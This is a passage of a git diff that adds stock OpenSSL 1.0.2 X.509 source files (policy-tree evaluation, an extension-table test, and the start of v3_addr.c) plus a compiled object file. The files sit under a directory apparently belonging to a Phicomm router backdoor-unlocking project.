+    /* Iterate through all in nodes linking matches */
+    for (i = 0; i < sk_X509_POLICY_NODE_num(last->nodes); i++) {
+        node = sk_X509_POLICY_NODE_value(last->nodes, i);
+        if (policy_node_match(last, node, data->valid_policy)) {
+            if (!level_add_node(curr, data, node, NULL))
+                return 0;
+            matched = 1;
+        }
+    }
+    if (!matched && last->anyPolicy) {
+        if (!level_add_node(curr, data, last->anyPolicy, NULL))
+            return 0;
+    }
+    return 1;
+}
+
+/*
+ * This corresponds to RFC3280 6.1.3(d)(1): link any data from
+ * CertificatePolicies onto matching parent or anyPolicy if no match.
+ */
+
+static int tree_link_nodes(X509_POLICY_LEVEL *curr,
+                           const X509_POLICY_CACHE *cache)
+{
+    int i;
+    X509_POLICY_DATA *data;
+
+    for (i = 0; i < sk_X509_POLICY_DATA_num(cache->data); i++) {
+        data = sk_X509_POLICY_DATA_value(cache->data, i);
+        /*
+         * If a node is mapped any it doesn't have a corresponding
+         * CertificatePolicies entry. However such an identical node would
+         * be created if anyPolicy matching is enabled because there would be
+         * no match with the parent valid_policy_set. So we create link
+         * because then it will have the mapping flags right and we can prune
+         * it later.
+         */
+#if 0
+        if ((data->flags & POLICY_DATA_FLAG_MAPPED_ANY)
+            && !(curr->flags & X509_V_FLAG_INHIBIT_ANY))
+            continue;
+#endif
+        /* Look for matching nodes in previous level */
+        if (!tree_link_matching_nodes(curr, data))
+            return 0;
+    }
+    return 1;
+}
+
+/*
+ * This corresponds to RFC3280 6.1.3(d)(2): Create new data for any unmatched
+ * policies in the parent and link to anyPolicy.
+ */
+
+static int tree_add_unmatched(X509_POLICY_LEVEL *curr,
+                              const X509_POLICY_CACHE *cache,
+                              const ASN1_OBJECT *id,
+                              X509_POLICY_NODE *node, X509_POLICY_TREE *tree)
+{
+    X509_POLICY_DATA *data;
+    if (id == NULL)
+        id = node->data->valid_policy;
+    /*
+     * Create a new node with qualifiers from anyPolicy and id from unmatched
+     * node.
+     */
+    data = policy_data_new(NULL, id, node_critical(node));
+
+    if (data == NULL)
+        return 0;
+    /* Curr may not have anyPolicy */
+    data->qualifier_set = cache->anyPolicy->qualifier_set;
+    data->flags |= POLICY_DATA_FLAG_SHARED_QUALIFIERS;
+    if (!level_add_node(curr, data, node, tree)) {
+        policy_data_free(data);
+        return 0;
+    }
+
+    return 1;
+}
+
+static int tree_link_unmatched(X509_POLICY_LEVEL *curr,
+                               const X509_POLICY_CACHE *cache,
+                               X509_POLICY_NODE *node, X509_POLICY_TREE *tree)
+{
+    const X509_POLICY_LEVEL *last = curr - 1;
+    int i;
+
+    if ((last->flags & X509_V_FLAG_INHIBIT_MAP)
+        || !(node->data->flags & POLICY_DATA_FLAG_MAPPED)) {
+        /* If no policy mapping: matched if one child present */
+        if (node->nchild)
+            return 1;
+        if (!tree_add_unmatched(curr, cache, NULL, node, tree))
+            return 0;
+        /* Add it */
+    } else {
+        /* If mapping: matched if one child per expected policy set */
+        STACK_OF(ASN1_OBJECT) *expset = node->data->expected_policy_set;
+        if (node->nchild == sk_ASN1_OBJECT_num(expset))
+            return 1;
+        /* Locate unmatched nodes */
+        for (i = 0; i < sk_ASN1_OBJECT_num(expset); i++) {
+            ASN1_OBJECT *oid = sk_ASN1_OBJECT_value(expset, i);
+            if (level_find_node(curr, node, oid))
+                continue;
+            if (!tree_add_unmatched(curr, cache, oid, node, tree))
+                return 0;
+        }
+
+    }
+
+    return 1;
+
+}
+
+static int tree_link_any(X509_POLICY_LEVEL *curr,
+                         const X509_POLICY_CACHE *cache,
+                         X509_POLICY_TREE *tree)
+{
+    int i;
+    /*
+     * X509_POLICY_DATA *data;
+     */
+    X509_POLICY_NODE *node;
+    X509_POLICY_LEVEL *last = curr - 1;
+
+    for (i = 0; i < sk_X509_POLICY_NODE_num(last->nodes); i++) {
+        node = sk_X509_POLICY_NODE_value(last->nodes, i);
+
+        if (!tree_link_unmatched(curr, cache, node, tree))
+            return 0;
+
+#if 0
+
+        /*
+         * Skip any node with any children: we only want unmathced nodes.
+         * Note: need something better for policy mapping because each node
+         * may have multiple children
+         */
+        if (node->nchild)
+            continue;
+
+        /*
+         * Create a new node with qualifiers from anyPolicy and id from
+         * unmatched node.
+         */
+        data = policy_data_new(NULL, node->data->valid_policy,
+                               node_critical(node));
+
+        if (data == NULL)
+            return 0;
+        /* Curr may not have anyPolicy */
+        data->qualifier_set = cache->anyPolicy->qualifier_set;
+        data->flags |= POLICY_DATA_FLAG_SHARED_QUALIFIERS;
+        if (!level_add_node(curr, data, node, tree)) {
+            policy_data_free(data);
+            return 0;
+        }
+#endif
+
+    }
+    /* Finally add link to anyPolicy */
+    if (last->anyPolicy) {
+        if (!level_add_node(curr, cache->anyPolicy, last->anyPolicy, NULL))
+            return 0;
+    }
+    return 1;
+}
+
+/*
+ * Prune the tree: delete any child mapped child data on the current level
+ * then proceed up the tree deleting any data with no children. If we ever
+ * have no data on a level we can halt because the tree will be empty.
+ */
+
+static int tree_prune(X509_POLICY_TREE *tree, X509_POLICY_LEVEL *curr)
+{
+    STACK_OF(X509_POLICY_NODE) *nodes;
+    X509_POLICY_NODE *node;
+    int i;
+    nodes = curr->nodes;
+    if (curr->flags & X509_V_FLAG_INHIBIT_MAP) {
+        for (i = sk_X509_POLICY_NODE_num(nodes) - 1; i >= 0; i--) {
+            node = sk_X509_POLICY_NODE_value(nodes, i);
+            /* Delete any mapped data: see RFC3280 XXXX */
+            if (node->data->flags & POLICY_DATA_FLAG_MAP_MASK) {
+                node->parent->nchild--;
+                OPENSSL_free(node);
+                (void)sk_X509_POLICY_NODE_delete(nodes, i);
+            }
+        }
+    }
+
+    for (;;) {
+        --curr;
+        nodes = curr->nodes;
+        for (i = sk_X509_POLICY_NODE_num(nodes) - 1; i >= 0; i--) {
+            node = sk_X509_POLICY_NODE_value(nodes, i);
+            if (node->nchild == 0) {
+                node->parent->nchild--;
+                OPENSSL_free(node);
+                (void)sk_X509_POLICY_NODE_delete(nodes, i);
+            }
+        }
+        if (curr->anyPolicy && !curr->anyPolicy->nchild) {
+            if (curr->anyPolicy->parent)
+                curr->anyPolicy->parent->nchild--;
+            OPENSSL_free(curr->anyPolicy);
+            curr->anyPolicy = NULL;
+        }
+        if (curr == tree->levels) {
+            /* If we zapped anyPolicy at top then tree is empty */
+            if (!curr->anyPolicy)
+                return 2;
+            return 1;
+        }
+    }
+
+    return 1;
+
+}
+
+static int tree_add_auth_node(STACK_OF(X509_POLICY_NODE) **pnodes,
+                              X509_POLICY_NODE *pcy)
+{
+    if (!*pnodes) {
+        *pnodes = policy_node_cmp_new();
+        if (!*pnodes)
+            return 0;
+    } else if (sk_X509_POLICY_NODE_find(*pnodes, pcy) != -1)
+        return 1;
+
+    if (!sk_X509_POLICY_NODE_push(*pnodes, pcy))
+        return 0;
+
+    return 1;
+
+}
+
+/*
+ * Calculate the authority set based on policy tree. The 'pnodes' parameter
+ * is used as a store for the set of policy nodes used to calculate the user
+ * set. If the authority set is not anyPolicy then pnodes will just point to
+ * the authority set. If however the authority set is anyPolicy then the set
+ * of valid policies (other than anyPolicy) is store in pnodes. The return
+ * value of '2' is used in this case to indicate that pnodes should be freed.
+ */
+
+static int tree_calculate_authority_set(X509_POLICY_TREE *tree,
+                                        STACK_OF(X509_POLICY_NODE) **pnodes)
+{
+    X509_POLICY_LEVEL *curr;
+    X509_POLICY_NODE *node, *anyptr;
+    STACK_OF(X509_POLICY_NODE) **addnodes;
+    int i, j;
+    curr = tree->levels + tree->nlevel - 1;
+
+    /* If last level contains anyPolicy set is anyPolicy */
+    if (curr->anyPolicy) {
+        if (!tree_add_auth_node(&tree->auth_policies, curr->anyPolicy))
+            return 0;
+        addnodes = pnodes;
+    } else
+        /* Add policies to authority set */
+        addnodes = &tree->auth_policies;
+
+    curr = tree->levels;
+    for (i = 1; i < tree->nlevel; i++) {
+        /*
+         * If no anyPolicy node on this this level it can't appear on lower
+         * levels so end search.
+         */
+        if (!(anyptr = curr->anyPolicy))
+            break;
+        curr++;
+        for (j = 0; j < sk_X509_POLICY_NODE_num(curr->nodes); j++) {
+            node = sk_X509_POLICY_NODE_value(curr->nodes, j);
+            if ((node->parent == anyptr)
+                && !tree_add_auth_node(addnodes, node))
+                return 0;
+        }
+    }
+
+    if (addnodes == pnodes)
+        return 2;
+
+    *pnodes = tree->auth_policies;
+
+    return 1;
+}
+
+static int tree_calculate_user_set(X509_POLICY_TREE *tree,
+                                   STACK_OF(ASN1_OBJECT) *policy_oids,
+                                   STACK_OF(X509_POLICY_NODE) *auth_nodes)
+{
+    int i;
+    X509_POLICY_NODE *node;
+    ASN1_OBJECT *oid;
+
+    X509_POLICY_NODE *anyPolicy;
+    X509_POLICY_DATA *extra;
+
+    /*
+     * Check if anyPolicy present in authority constrained policy set: this
+     * will happen if it is a leaf node.
+     */
+
+    if (sk_ASN1_OBJECT_num(policy_oids) <= 0)
+        return 1;
+
+    anyPolicy = tree->levels[tree->nlevel - 1].anyPolicy;
+
+    for (i = 0; i < sk_ASN1_OBJECT_num(policy_oids); i++) {
+        oid = sk_ASN1_OBJECT_value(policy_oids, i);
+        if (OBJ_obj2nid(oid) == NID_any_policy) {
+            tree->flags |= POLICY_FLAG_ANY_POLICY;
+            return 1;
+        }
+    }
+
+    for (i = 0; i < sk_ASN1_OBJECT_num(policy_oids); i++) {
+        oid = sk_ASN1_OBJECT_value(policy_oids, i);
+        node = tree_find_sk(auth_nodes, oid);
+        if (!node) {
+            if (!anyPolicy)
+                continue;
+            /*
+             * Create a new node with policy ID from user set and qualifiers
+             * from anyPolicy.
+             */
+            extra = policy_data_new(NULL, oid, node_critical(anyPolicy));
+            if (!extra)
+                return 0;
+            extra->qualifier_set = anyPolicy->data->qualifier_set;
+            extra->flags = POLICY_DATA_FLAG_SHARED_QUALIFIERS
+                | POLICY_DATA_FLAG_EXTRA_NODE;
+            node = level_add_node(NULL, extra, anyPolicy->parent, tree);
+        }
+        if (!tree->user_policies) {
+            tree->user_policies = sk_X509_POLICY_NODE_new_null();
+            if (!tree->user_policies)
+                return 1;
+        }
+        if (!sk_X509_POLICY_NODE_push(tree->user_policies, node))
+            return 0;
+    }
+    return 1;
+
+}
+
+static int tree_evaluate(X509_POLICY_TREE *tree)
+{
+    int ret, i;
+    X509_POLICY_LEVEL *curr = tree->levels + 1;
+    const X509_POLICY_CACHE *cache;
+
+    for (i = 1; i < tree->nlevel; i++, curr++) {
+        cache = policy_cache_set(curr->cert);
+        if (!tree_link_nodes(curr, cache))
+            return 0;
+
+        if (!(curr->flags & X509_V_FLAG_INHIBIT_ANY)
+            && !tree_link_any(curr, cache, tree))
+            return 0;
+        tree_print("before tree_prune()", tree, curr);
+        ret = tree_prune(tree, curr);
+        if (ret != 1)
+            return ret;
+    }
+
+    return 1;
+
+}
+
+static void exnode_free(X509_POLICY_NODE *node)
+{
+    if (node->data && (node->data->flags & POLICY_DATA_FLAG_EXTRA_NODE))
+        OPENSSL_free(node);
+}
+
+void X509_policy_tree_free(X509_POLICY_TREE *tree)
+{
+    X509_POLICY_LEVEL *curr;
+    int i;
+
+    if (!tree)
+        return;
+
+    sk_X509_POLICY_NODE_free(tree->auth_policies);
+    sk_X509_POLICY_NODE_pop_free(tree->user_policies, exnode_free);
+
+    for (i = 0, curr = tree->levels; i < tree->nlevel; i++, curr++) {
+        if (curr->cert)
+            X509_free(curr->cert);
+        if (curr->nodes)
+            sk_X509_POLICY_NODE_pop_free(curr->nodes, policy_node_free);
+        if (curr->anyPolicy)
+            policy_node_free(curr->anyPolicy);
+    }
+
+    if (tree->extra_data)
+        sk_X509_POLICY_DATA_pop_free(tree->extra_data, policy_data_free);
+
+    OPENSSL_free(tree->levels);
+    OPENSSL_free(tree);
+
+}
+
+/*-
+ * Application policy checking function.
+ * Return codes:
+ *  0   Internal Error.
+ *  1   Successful.
+ * -1   One or more certificates contain invalid or inconsistent extensions
+ * -2   User constrained policy set empty and requireExplicit true.
+ */
+
+int X509_policy_check(X509_POLICY_TREE **ptree, int *pexplicit_policy,
+                      STACK_OF(X509) *certs,
+                      STACK_OF(ASN1_OBJECT) *policy_oids, unsigned int flags)
+{
+    int ret;
+    X509_POLICY_TREE *tree = NULL;
+    STACK_OF(X509_POLICY_NODE) *nodes, *auth_nodes = NULL;
+    *ptree = NULL;
+
+    *pexplicit_policy = 0;
+    ret = tree_init(&tree, certs, flags);
+
+    switch (ret) {
+
+        /* Tree empty requireExplicit False: OK */
+    case 2:
+        return 1;
+
+        /* Some internal error */
+    case -1:
+        return -1;
+
+        /* Some internal error */
+    case 0:
+        return 0;
+
+        /* Tree empty requireExplicit True: Error */
+
+    case 6:
+        *pexplicit_policy = 1;
+        return -2;
+
+        /* Tree OK requireExplicit True: OK and continue */
+    case 5:
+        *pexplicit_policy = 1;
+        break;
+
+        /* Tree OK: continue */
+
+    case 1:
+        if (!tree)
+            /*
+             * tree_init() returns success and a null tree
+             * if it's just looking at a trust anchor.
+             * I'm not sure that returning success here is
+             * correct, but I'm sure that reporting this
+             * as an internal error which our caller
+             * interprets as a malloc failure is wrong.
+             */
+            return 1;
+        break;
+    }
+
+    if (!tree)
+        goto error;
+    ret = tree_evaluate(tree);
+
+    tree_print("tree_evaluate()", tree, NULL);
+
+    if (ret <= 0)
+        goto error;
+
+    /* Return value 2 means tree empty */
+    if (ret == 2) {
+        X509_policy_tree_free(tree);
+        if (*pexplicit_policy)
+            return -2;
+        else
+            return 1;
+    }
+
+    /* Tree is not empty: continue */
+
+    ret = tree_calculate_authority_set(tree, &auth_nodes);
+
+    if (!ret)
+        goto error;
+
+    if (!tree_calculate_user_set(tree, policy_oids, auth_nodes))
+        goto error;
+
+    if (ret == 2)
+        sk_X509_POLICY_NODE_free(auth_nodes);
+
+    if (tree)
+        *ptree = tree;
+
+    if (*pexplicit_policy) {
+        nodes = X509_policy_tree_get0_user_policies(tree);
+        if (sk_X509_POLICY_NODE_num(nodes) <= 0)
+            return -2;
+    }
+
+    return 1;
+
+ error:
+
+    X509_policy_tree_free(tree);
+
+    return 0;
+
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/pcy_tree.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/pcy_tree.o
new file mode 100644
index 0000000000000000000000000000000000000000..83edd762ea001418b8837353fbaf43f1ca44a79a
GIT binary patch
literal 7744
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
IpYr+t1+0#gr~m)}

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/tabtest.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/tabtest.c
new file mode 100644
index 0000000..145dc9d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/tabtest.c
@@ -0,0 +1,92 @@
+/* tabtest.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 1999.
+ */
+/* ====================================================================
+ * Copyright (c) 1999 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+/*
+ * Simple program to check the ext_dat.h is correct and print out problems if
+ * it is not.
+ */
+
+#include <stdio.h>
+
+#include <openssl/x509v3.h>
+
+#include "ext_dat.h"
+
+main()
+{
+    int i, prev = -1, bad = 0;
+    X509V3_EXT_METHOD **tmp;
+    i = sizeof(standard_exts) / sizeof(X509V3_EXT_METHOD *);
+    if (i != STANDARD_EXTENSION_COUNT)
+        fprintf(stderr, "Extension number invalid expecting %d\n", i);
+    tmp = standard_exts;
+    for (i = 0; i < STANDARD_EXTENSION_COUNT; i++, tmp++) {
+        if ((*tmp)->ext_nid < prev)
+            bad = 1;
+        prev = (*tmp)->ext_nid;
+
+    }
+    if (bad) {
+        tmp = standard_exts;
+        fprintf(stderr, "Extensions out of order!\n");
+        for (i = 0; i < STANDARD_EXTENSION_COUNT; i++, tmp++)
+            printf("%d : %s\n", (*tmp)->ext_nid, OBJ_nid2sn((*tmp)->ext_nid));
+    } else
+        fprintf(stderr, "Order OK\n");
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_addr.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_addr.c
new file mode 100644
index 0000000..94cfed0
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_addr.c
@@ -0,0 +1,1344 @@
+/*
+ * Contributed to the OpenSSL Project by the American Registry for
+ * Internet Numbers ("ARIN").
+ */
+/* ====================================================================
+ * Copyright (c) 2006 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
